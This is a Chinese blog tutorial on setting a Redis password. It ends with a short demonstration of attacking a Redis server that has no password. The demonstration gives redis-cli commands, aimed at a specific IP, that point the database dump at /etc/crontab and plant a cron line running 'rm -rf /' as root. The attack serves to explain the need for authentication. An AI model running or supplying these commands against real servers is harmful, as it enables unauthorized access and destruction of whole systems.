Redis教程(三)Redis密码设置与无密码攻击

最新推荐文章于 2024-11-12 15:03:17 发布
最新推荐文章于 2024-11-12 15:03:17 发布
阅读量1.6k 收藏
点赞数
分类专栏: Redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42073629/article/details/117168789
版权

通过Redis客户端连接服务与进行操作默认是不需要密码的,任何人只要连上了服务器那么就可以操作Redis里的数据,而且还可以利用confit set来在线修改redis的配置实现攻击。所以对于暴露在公网中的Redis服务器,我们不光要设置密码,还要设置一个足够复杂的密码才可以,因为Redis的连接速度非常快,官方文档中介绍是每秒可以进行150k次破解。设置密码后客户端连接上Redis进行任何操作都需要验证后才可进行。

下面是给Redis服务设置密码的方法:

方法1:修改redis.conf配置文件以下选项,然后完成重启

#requirepass foobared
requirepass  yourredispassword  #密码一定要复杂点

方法2:在线修改配置,无需重启 

redis > config set requirepass 'redis_pass'
redis > config rewrite  #更新配置文件

设置密码后连接Redis,然后需要输入授权命令才可以进行操作,或者登录的时候加-a选项写出密码 

redis > auth  redis_password  #登录后验证密码
redis-cli -a redis_password  #登录前验证密码

入侵无密码的Redis过程演示

1、通过config set来修改rdb文件的存储路径和文件名

redis-cli -h 221.141.14.5 config set dir '/etc/' 
redis-cli -h 221.141.14.5 config set dbfilename 'crontab'

2、新建一个文本,用于之后redis读取后把这段内容添加到crontab中,文本上下各需要2行回车 

vi /tmp/attack.txt


* * * * * root rm -rf /

3、把标准输入的内容交给redis执行,这个时候crontab已经添加上了attack.txt中的内容 

cat /tmp/attack | redis-cli -h 221.141.14.5 -x set attack  #-x是从标准输入中读取
redis-cli save  #刷新rbd文件,让crontab被立即修改

 

Redis 密码设置和查看密码
阅读之后,对你有帮助,那就点个赞再走吧
07-09 1万+
redis没有实现访问控制这个功能,但是它提供了一个轻量级的认证方式,可以编辑redis.conf配置来启用认证。 1、初始化Redis密码: 在配置文件中有个参数: requirepass 这个就是配置redis访问密码的参数; 比如 requirepass test123; (Ps:需重启Redis才能生效) redis的查询速度是非常快的,外部用户一...
redis auth认证 密码设置
H_233的博客
11-06 2005
redis没有实现访问控制这个功能,但是它提供了一个轻量级的认证方式。 方式一 查看密码 config get requirepass 设置密码(**** 为需要设置密码) config set requirepass ***** 密码登录(**** 为设置密码) auth **** 具体过程如下 可以看到默认是无密码的,操作是无限制的。设置密码后,未成功登录的话,...
redis无密码登录
embelfe_segge的博客
03-23 1880
redis的配置文件redis.conf中,Redis3.2加入的新特性,开启保护模式。即开启了protected-mode,默认值为 protected-mode =yes 是说redis只允许本机登录。 这样登录的前提是要设置密码,即要requirepass属性, requirepass =你设置密码 如要无密码登录,就要设置protected-mode =no ,即可 ...
Redis主从配置和持久化(需要密码认证)(centos7)
renfeigui0的博客
11-09 1231
一、主从服务器安装redis服务 二、主从服务器同步配置(需密码认证) 、主从服务器同步测试 四、主从复制同步必要性 五、主从同步复制过程说明 六、持久化方式
设置Redis密码
最新发布
weixin_36797191的博客
11-12 908
这里,your_username是你要创建的用户名,your_password是用户的密码,+@all表示该用户拥有所有命令的权限。可以使用相应的命令来重启Redis服务,具体命令取决于你的操作系统和Redis的安装方式。去掉行头的注释符号#,并在后面添加你想要的密码。通过以上步骤,你可以在Redis设置密码并使用ACL功能来模拟用户级别的权限管理。在设置Redis密码和用户权限时,请确保密码的强度足够高,并妥善保管密码信息。使用ACL时,需要仔细配置用户的权限,以避免不必要的安全风险。
redis配置中设置密码无效,打开redis-cli.exe依然不需要输入密码
HUQWSYK的博客
01-16 3043
今天在redis.windows.conf配置文件中修改密码后,打开redis-cli.exe后,输入auth "password"后 127.0.0.1:6379> auth "password" (error) ERR Client sent AUTH, but no password is set 其实就是提示密码没有设置 原因: 后来检查服务器发现 这段话意思就是启用默认配置,想要...
设置redis访问密码
weixin_30456039的博客
05-16 643
在服务器上,这里以linux服务器为例,为redis配置密码。 1.第一种方式 (当前这种linux配置redis密码的方法是一种临时的,如果redis重启之后密码就会失效,) (1)首先进入redis,如果没有开启redis则需要先开启:[root@iZ94jzcra1hZ bin]# redis-cli -p 6379127.0.0.1:6379>(2)查看当前redis有没有设置...
Redis_password
qq_43460468的博客
01-01 3406
Redis以及其密码设置 Redis Redis 是一个开源,以键值对(key,value)方式实现高效地存取数据的存储容器。它经常作为 服务端 的数据结构,它的键的数据类型可以是: string 字符串(可以为整形、浮点型和字符串,统称为元素) list 列表(实现队列,元素不唯一,先入先出原则) set 集合(各不相同的元素) hash hash散列值(hash的key必须是唯一的) sort set 有序集合 关于Redis密码 1.不开启密码;在不开启密码的状态下Redis密码默认没有: 2.开启
Redis 用户验证
weixin_34195546的博客
06-07 987
redis没有实现访问控制这个功能,但是它提供了一个轻量级的认证方式,可以编辑redis.conf配置来启用认证。 1、初始化Redis密码: 在配置文件中有个参数: requirepass 这个就是配置redis访问密码的参数; 比如 requirepass test123; (Ps:需重启Redis才能生效) redis的查询速度是...
redis攻击还原
10-05
首先,文档指出Redis攻击的原理之一在于其默认配置并不安全,特别在未设置密码认证的情况下,任何知道Redis服务所在IP和端口的人都可以直接进行读写操作。例如,攻击者可以使用Redis的“CONFIG”命令来获取服务器...
Linux下安装配置redis详细教程,并配置哨兵模式,redis中文详解
07-07
注意:对只使用redis服务,如果从Redis也有必要加入访问验证,也可以设置requirepass,而且密码可以Redis密码不同。 将配置文件放置到/data/redis/conf目录下,然后就可以启动服务了。 启动服务要按照主从顺序...
redis设置无密码
08-19
- *1* *2* [Redis教程Redis密码设置无密码攻击](https://blog.csdn.net/weixin_42073629/article/details/117168789)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...
redis_密码
逗比程序猿^_^的博客
10-16 222
添加密码 # 设置访问密码 # 这在您不信任的环境中可能很有用,其他可以随意访问主机的用户,却不能随意访问redis。 requirepass zhj 登录 # 连接 redis-cli -p 8000 # 连接后无法执行任何读写操作,需要如下,输入密码 auth zhj // Jedis使用密码 Jedis jedis = new Jedis("192.168.110.135", 8000)...
Windows 的redis 设置密码问题
qq_43987149的博客
11-15 1586
1、前言 本来学习这个redis是打算设置一个永久性密码,但是不知道为什么设置密码不能永久生效,每次重启服务后密码就失效了,需要重新设置。 2、设置密码的方式 2.1 修改配置文件(我的由于没有真正的成功生效,只能是告诉在哪修改) 2.1.1打开配置文件(使用Editplus软件打开方便)redis.windows-service.conf ctrl+F 快捷键查找 requirepass,然后设置密码 2.1.2如果还有 redis.windows.conf 文件的话也打开以相同的方式修改一下吧,我不
Redis设置 AUTH 密码
Jcsim~
06-04 6122
1、临时密码(关闭redis密码失效) (1)首先进入redis,如果没有开启redis则需要先开启: 命令行启动:其中a、b一起启动,c则另一命令行启动 a、.\redis-server.exe 服务启动 b、.\redis.windows-service.conf 服务配置 c、.\redis-cli 客户端 (2)查看当前redis有没有设置密码: 127.0....
redis密码设置、访问权限控制等安全设置
weixin_33957648的博客
02-14 816
redis作为一个高速数据库,在互联网上,必须有对应的安全机制来进行保护,方法有2,如下。 1.比较安全的办法是采用绑定IP的方式来进行控制。  请在redis.conf文件找到如下配置 # If you want you can bind a single interface, if the bind option is not # specified all the inter...
java redis密码配置_jeeplus设置Redis密码
weixin_35677043的博客
02-28 1373
接手过来的jeeplus系统原本没有设置redis密码,近期要上线,为保证redis安全性,运维要求添加redis密码,且在线上环境为redis设置密码。接下来我需要修改程序内容来迎合运维此项修改,方式如下:设置Redis密码涉及到以下个文件,分别是:jeeplus.properties、spring-context-jedis.xml和JedisUtils.java。以上个文件的含义为如下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值